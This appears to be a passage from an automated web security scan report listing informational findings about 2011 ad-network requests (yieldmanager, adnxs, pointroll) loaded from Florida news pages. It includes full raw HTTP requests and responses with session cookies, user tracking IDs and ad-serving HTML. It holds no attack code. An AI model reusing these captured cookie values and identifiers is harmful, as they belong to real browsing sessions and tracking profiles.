Set-Cookie: lifb=>MqpcP`!q)8ZvPC; path=/; expires=Mon, 09-May-2011 16:00:11 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:11 GMT
Pragma: no-cache
Content-Length: 3250
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093450);}
</script><iframe src="http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bbbd3235f1e96dfce%253B12fd50eda48%2C0%253B%253B%253B2291833273%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAR9oO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQBBuAEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496111384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="468" height="60"><script language="JavaScript" type="text/javascript">
...[SNIP]...
ICode=2250555&pub=321582&partnerID=64&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel&redirectURL=http://clk.atdmt.com/COM/go/286738722/direct;wi.468;hi.60/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/286738722/direct;wi.468;hi.60/01/" /></a></noscript></iframe> <img src='http://t.invitemedia.com/track_imp?partnerID=64&campID=60443&crID=86537&auctionID=13049496111384085-86537&cost=2.1000&pubICode=2250555&pub=321582&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=64" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.8. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?qgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAAEkwcFvb2CEAfhetRuB4VQJMkCFdAARpAAAAAAAAAJkCTJAhXQAEaQAAAAAAAACZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADtn0Nh.dcQCppBTeTDrpfD0OJ3wGgTcPnYn7lHAAAAAA==,,http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly-publicized-murder-caylee-anthony-rivets-enrages,Z%3D728x90%26s%3D1806342%26r%3D1%26_salt%3D767396576%26u%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages,b2580d06-7a44-11e0-b3e1-cfa36ff23e07 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!@!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypn>!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; vuday1=qtDL:!1e0g7s@DV; pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!*:n8!$8TB!024(!%:2h!!!!$!?5%!%5F4/!wDW,!%Ua]!%]N-!'>cc~~~~~<ypn>=!oTW~"; lifb=>MqpcO*GC#f9s%I; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!(<ypnT!!-?2!!!!.<ypnT!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!)<ypnT!!0O4!!!!*<ypn@!!0O<!!!!1<ypn@!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!0<ypn@!!J<E!!!!0<ypn@!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!)<ypnT!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!'<ypnT!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!1<ypn@!!q:E!!!!.<ypn@!!q<+!!!!/<ypn@!!q</!!!!/<ypn@!!q<3!!!!/<ypn@!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<ypn@!!tjQ!!!!)<ypnT!!ucq!!!!1<ypn@!!vRm!!!!*<ypn@!!vRq!!!!*<ypn@!!vRr!!!!*<ypn@!!vRw!!!!1<ypn@!!vRx!!!!*<ypn@!!vRy!!!!*<ypn@!!w3l!!!!)<ypnT!!wQ3!!!!)<ypnT!!wQ5!!!!)<ypnT!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!*<ypn@!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!'<ypnT!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!*<ypnB!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!*<ypn@!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!
!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!*<ypn@!#7.'!!!!*<ypn@!#7.:!!!!*<ypn@!#7.O!!!!*<ypn@!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!*<ypn@!#MTF!!!!*<ypn@!#MTH!!!!*<ypn@!#MTI!!!!*<ypn@!#MTJ!!!!*<ypn@!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N45!!!!#<xr]M!#O29!!!!'<ypnT!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!0<ypn@!#SF3!!!!0<ypn@!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!*<ypn@!#UDP!!!!0<ypn@!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!'<ypnT!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!'<ypnT!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!'<ypnT!#`S2!!!!)<ypnT!#`U0!!!!(<ypnT!#`U9!!!!'<ypnT!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!(<ypnT!#a=7!!!!(<ypnT!#a=9!!!!(<ypnT!#a=P!!!!(<ypnT!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!*<ypn@!#ai7!!!!*<ypn@!#ai?!!!!*<ypn@!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!'<ypnT!#c8W!!!!'<ypnT!#c8X!!!!'<ypnT!#c8]!!!!'<ypnT!#c?c!!!!*<ypn@!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!'<ypnT!#fG+!!!!(<ypnT!#g=!!!!!'<ypnT!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!'<ypnT!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!*<ypn@!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!*<ypn@!#tM)!!!!*<ypn@!#tn2!!!!*<ypn@!#uE=!!!!#<x9#K!#uJY!!!!0<ypn@!#uR3!!!!'<ypnT!#ujQ!!!!'<ypnT!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!*<yp
n@!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!-<ypn@!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!%<ypnT!$#R7!!!!*<ypn@!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!*<ypn@!$(!P!!!!)<ypnT!$(+N!!!!#<wGkB!$(Gt!!!!-<ypn@!$(S9!!!!'<ypnT!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!)<ypnT!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!'<ypnT"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0321.rm.bf1
Set-Cookie: ih="b!!!!A!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypn>!0242!!!!#<ypnX!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; path=/; expires=Wed, 08-May-2013 14:00:32 GMT
Set-Cookie: vuday1=[[@+$qtDL:!1e0g/LZHY; path=/; expires=Tue, 10-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnX=!oTr~"; path=/; expires=Wed, 08-May-2013 14:00:32 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=9,/lZ!-e1I>MqpcO*GC#@ijno; path=/; expires=Mon, 09-May-2011 22:00:32 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:32 GMT
Pragma: no-cache
Content-Length: 3803
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8093460);}
</script><iframe src="http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B9e9e87971bc07a46%253B12fd50f2edc%2C0%253B%253B%253B2764451420%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA3C4P1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwCGhAEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496321806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages&redirectURL=http://clk.atdmt.com/COM/go/286738708/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/286738708/direct;wi.728;hi.90/01/" /></a></noscript></iframe> <img src='http://t.invitemedia.com/track_imp?partnerID=64&campID=64375&crID=86546&auctionID=13049496321806342-86546&cost=6.5012&pubICode=2687862&pub=347615&url=http%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=64" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.9. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:15 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

15.10. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
